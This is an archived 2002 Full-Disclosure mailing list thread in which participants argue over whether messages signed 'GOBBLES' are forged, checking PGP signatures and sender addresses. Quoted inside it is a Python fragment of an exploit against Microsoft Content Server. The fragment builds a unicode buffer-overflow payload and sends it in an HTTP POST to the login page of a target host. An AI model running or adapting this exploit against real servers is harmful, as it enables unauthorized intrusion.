lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <200208142217.g7EMH3042947@mailserver4.hushmail.com> From: security-protocols at hushmail.com (security-protocols@...hmail.com) Subject: ALERT! ALERT! Confessions of a turkey ALERT! ALERT! ;p;p;p;p;p;p;p -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Maybe noone has noticed this but, this person is sending as 'gobbles@...h.com' and not the real 'gobbles@...hmail.com'. See below: @hush.com email addresses 27/7/02 - Is yourname @hushmail.com already taken? Sign up now for a hush.com email address. - - -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 You supposed to be turkey friend turkey crew wanttobe yet you question show respect to turkey On 14 Aug 2002 17:06:11 -0400, full-disclosure@...ts.netsys.com wrote: >At least you got the key id correct that time. It's not a valid >signature, but at least it produces one less error message. > >-dave > >ObExploit: > >#fragment of my exploit for MS Content Server >#the full exploit can be found at https://immunitysec.com/members/ #but >if you're not a member, this might save you some time writing your >#exploit. > >#returns the sploitstring > def makesploit(self): > header="" > body="" > > body+="NR_DOMAIN=WinNT%3A%2F%2F" > #1 alignment byte so we are word aligned with the return addr > attack="" > attack+="A" > attack+="\x41\xb9"*4000 > #unicode shellcode!! > attack=stroverwrite(attack,unicodeloop,1) > print "length of overflow = "+str(len(attack)) > attack=urllib.quote(attack) > #print attack > > body+=attack > >body+="&NR_DOMAIN_LIST=WinNT%3A%2F%2FOAG4ZA0SR80BCRG&NR_USER=&NR_PASS >WORD=&submit1=Continue&NEXTURL=%2FNR%2FSystem%2FAccess%2FDefaultGuest >Login.asp" > > > > header+="POST /NR/System/Access/ManualLoginSubmit.asp >HTTP/1.1\r\n" > header+="Host: "+self.host+"\r\n" > header+="User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows >NT; Bob)\r\n" > header+="Accept: >text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/pla >in >;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,text/css,*/*;q >=0.1\r\n" > header+="Connection: keep-alive\r\n" > header+="Content-Type: application/x-www-form-urlencoded\r\n" > header+="Content-Length: "+str(len(body))+"\r\n" > header+="\r\n" > > return header+body > > > >#this stuff happens. >if __name__ == '__main__': > > print "Running Microsoft Content Server exploit v 0.1" > app = mscsexploit() > if len(sys.argv) < 2: > print "Usage: mycontent.py target [port] [ssl=0]" > sys.exit() > > app.setHost(sys.argv[1]) > if len(sys.argv) > 2: > app.setPort(int(sys.argv[2])) > > if len(sys.argv) > 3: > app.setSSL(1) > > app.run() > > >On Wed, 2002-08-14 at 17:00, gobbles@...h.com wrote: >> >> -----BEGIN PGP SIGNED MESSAGE----- >> Hash: SHA1 >> >> or if you like >> >> On 14 Aug 2002 16:36:09 -0400, Dave Aitel <dave@...unitysec.com> >> wrote: >> >On Wed, 2002-08-14 at 17:04, Charles Stevenson wrote: >> >> Gobbles, >> >> >> >> On Wed, Aug 14, 2002 at 12:33:27PM -0700, gobbles@...h.com wrote: >> >> > GOBBLES just want to be cool whitehat like everyone else. Time >> >> > for >new >> > leaf time for six figure salary stock option naked breasted >> > assistant. >> >> >> >> Word to that my man! ;) >> >> >> >> peace, >> >> core >> > >> >Your message was signed, but the "GOBBLES" message was not and >> >therefore just a forgery, most likely. >> > >> >BTW: >> >http://www.immunitysec.com/vulnerabilities/ >> >They arn't advisories, but if you need something to show to your >> >boss about why you disconnected your Exchange/SQL server from the >> >Internet, it's a good start. >> > >> >Dave Aitel >> >Immunity, Inc >> > >> > >> >> -----BEGIN PGP SIGNATURE----- >> Version: Hush 2.1 >> Note: This signature can be verified at https://www.hushtools.com >> >> wlwEARECABwFAj1H8s4VHGdvYmJsZXNAaHVzaG1haWwuY29tAAoJEBzRp5chmbAPl8QA >> nA66Z1OWuMnTnOhLlFQLa0nOHSZtAJsFKJo5AOe/7/OYbXpZRd3grAD8MQ== >> =xfu0 >> -----END PGP SIGNATURE----- >> >> >> Communicate in total privacy. >> Get your free encrypted email at https://www.hushmail.com/?l=2 >> >> Looking for a good deal on a domain name? >> http://www.hush.com/partners/of >fers.cgi?id=domainpeople >> >> > - - -----BEGIN PGP SIGNATURE----- Version: Hush 2.1 Note: This signature can be verified at https://www.hushtools.com wlgEARECABgFAj1ayx0RHGdvYmJsZXNAaHVzaC5jb20ACgkQpmwDHEAx56uBwgCgrzaw 9J7jHuxLlnnPRAQi7pVgx/8An2SfUM0vQPa0Qb1kbwD1FouFtcWi =9eW6 - - -----END PGP SIGNATURE----- Communicate in total privacy. Get your free encrypted email at https://www.hushmail.com/?l=2 Looking for a good deal on a domain name? http://www.hush.com/partners/offers.cgi?id=domainpeople _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html -----BEGIN PGP SIGNATURE----- Version: Hush 2.1 Note: This signature can be verified at https://www.hushtools.com wmcEARECACcFAj1a1V8gHHNlY3VyaXR5LXByb3RvY29sc0BodXNobWFpbC5jb20ACgkQ NAoGe68ymd16tACdGhj0H0rmHla8zAQMPX/Vh5Wya8QAn3FK7K4C1+h8RqTLjIBPKU3M d18c =gcJ+ -----END PGP SIGNATURE----- Communicate in total privacy. Get your free encrypted email at https://www.hushmail.com/?l=2 Looking for a good deal on a domain name? http://www.hush.com/partners/offers.cgi?id=domainpeople
Powered by blists - more mailing lists